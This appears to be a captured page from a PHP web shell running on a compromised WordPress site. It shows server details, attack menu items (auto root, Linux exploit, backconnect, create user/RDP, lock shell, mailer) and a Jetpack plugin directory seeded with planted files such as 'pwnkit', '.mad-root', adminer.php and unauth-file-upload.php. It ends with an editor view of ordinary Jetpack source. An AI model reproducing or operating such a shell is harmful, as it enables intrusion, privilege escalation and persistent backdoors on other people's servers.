Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
plugins /
jetpack /
[ HOME SHELL ]
Name
Size
Permission
Action
3rd-party
[ DIR ]
drwxr-xr-x
_inc
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
extensions
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
jetpack_vendor
[ DIR ]
drwxr-xr-x
json-endpoints
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
sal
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
CHANGELOG.md
773.27
KB
-rw-r--r--
LICENSE.txt
18.2
KB
-rw-r--r--
SECURITY.md
2.45
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
class-jetpack-connection-statu...
728
B
-rw-r--r--
class-jetpack-gallery-settings...
3.47
KB
-rw-r--r--
class-jetpack-newsletter-dashb...
436
B
-rw-r--r--
class-jetpack-pre-connection-j...
2.34
KB
-rw-r--r--
class-jetpack-stats-dashboard-...
7.46
KB
-rw-r--r--
class-jetpack-xmlrpc-methods.p...
7.38
KB
-rw-r--r--
class.frame-nonce-preview.php
3.22
KB
-rw-r--r--
class.jetpack-admin.php
21.28
KB
-rw-r--r--
class.jetpack-autoupdate.php
9.93
KB
-rw-r--r--
class.jetpack-cli.php
74.32
KB
-rw-r--r--
class.jetpack-client-server.ph...
2.62
KB
-rw-r--r--
class.jetpack-gutenberg.php
45.32
KB
-rw-r--r--
class.jetpack-heartbeat.php
4.44
KB
-rw-r--r--
class.jetpack-modules-list-tab...
14.81
KB
-rw-r--r--
class.jetpack-network-sites-li...
6.03
KB
-rw-r--r--
class.jetpack-network.php
22.19
KB
-rw-r--r--
class.jetpack-plan.php
4.09
KB
-rw-r--r--
class.jetpack-post-images.php
11.72
KB
-rw-r--r--
class.jetpack-twitter-cards.ph...
5.69
KB
-rw-r--r--
class.jetpack-user-agent.php
25.3
KB
-rw-r--r--
class.jetpack.php
205.12
KB
-rw-r--r--
class.json-api-endpoints.php
91.64
KB
-rw-r--r--
class.json-api.php
38.3
KB
-rw-r--r--
class.photon.php
1.74
KB
-rw-r--r--
composer.json
4.29
KB
-rw-r--r--
enhanced-open-graph.php
4.71
KB
-rw-r--r--
functions.compat.php
4.34
KB
-rw-r--r--
functions.cookies.php
2.04
KB
-rw-r--r--
functions.global.php
15.87
KB
-rw-r--r--
functions.is-mobile.php
2.47
KB
-rw-r--r--
functions.opengraph.php
30.99
KB
-rw-r--r--
functions.photon.php
3.04
KB
-rw-r--r--
jetpack.php
8.92
KB
-rw-r--r--
json-api-config.php
338
B
-rw-r--r--
json-endpoints.php
6.92
KB
-rw-r--r--
load-jetpack.php
3.69
KB
-rw-r--r--
locales.php
371
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
33.65
KB
-rw-r--r--
unauth-file-upload.php
5.85
KB
-rw-r--r--
uninstall.php
1.65
KB
-rw-r--r--
wpml-config.xml
1.26
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class.jetpack-client-server.php
<?php // phpcs:ignore WordPress.Files.FileName.InvalidClassFileName /** * Client = Plugin * Client Server = API Methods the Plugin must respond to * * @package automattic/jetpack */ /** * Client = Plugin * Client Server = API Methods the Plugin must respond to */ class Jetpack_Client_Server { /** * Whether the class has been initialized. * * @var bool */ private static $did_init = false; /** * Initialize the hooks, but only once. * * @return void */ public static function init() { if ( static::$did_init ) { return; } add_filter( 'jetpack_rest_connection_check_response', array( static::class, 'connection_check' ) ); static::$did_init = true; } /** * Handle the client authorization error. * * @param WP_Error $error The error object. */ public static function client_authorize_error( $error ) { if ( $error instanceof WP_Error ) { Jetpack::state( 'error', $error->get_error_code() ); } } /** * The user is already authorized, we set the Jetpack state and adjust the redirect URL. * * @return string */ public static function client_authorize_already_authorized_url() { Jetpack::state( 'message', 'already_authorized' ); return Jetpack::admin_url(); } /** * The authorization processing has started. */ public static function client_authorize_processing() { Jetpack::log( 'authorize' ); } /** * The authorization has completed (successfully or not), and the redirect URL is empty. * We set the Jetpack Dashboard as the default URL. * * @return string */ public static function client_authorize_fallback_url() { return Jetpack::admin_url(); } /** * Deactivate a plugin. * * @param string $probable_file Expected plugin file. * @param string $probable_title Expected plugin title. * @return int 1 if a plugin was deactivated, 0 if not. */ public static function deactivate_plugin( $probable_file, $probable_title ) { include_once ABSPATH . 'wp-admin/includes/plugin.php'; if ( is_plugin_active( $probable_file ) ) { deactivate_plugins( $probable_file ); return 1; } else { // If the plugin is not in the usual place, try looking through all active plugins. $active_plugins = Jetpack::get_active_plugins(); foreach ( $active_plugins as $plugin ) { $data = get_plugin_data( WP_PLUGIN_DIR . '/' . $plugin ); if ( $data['Name'] === $probable_title ) { deactivate_plugins( $plugin ); return 1; } } } return 0; } /** * Filters the result of test_connection REST method * * @return string The current Jetpack version number */ public static function connection_check() { return JETPACK__VERSION; } }
Close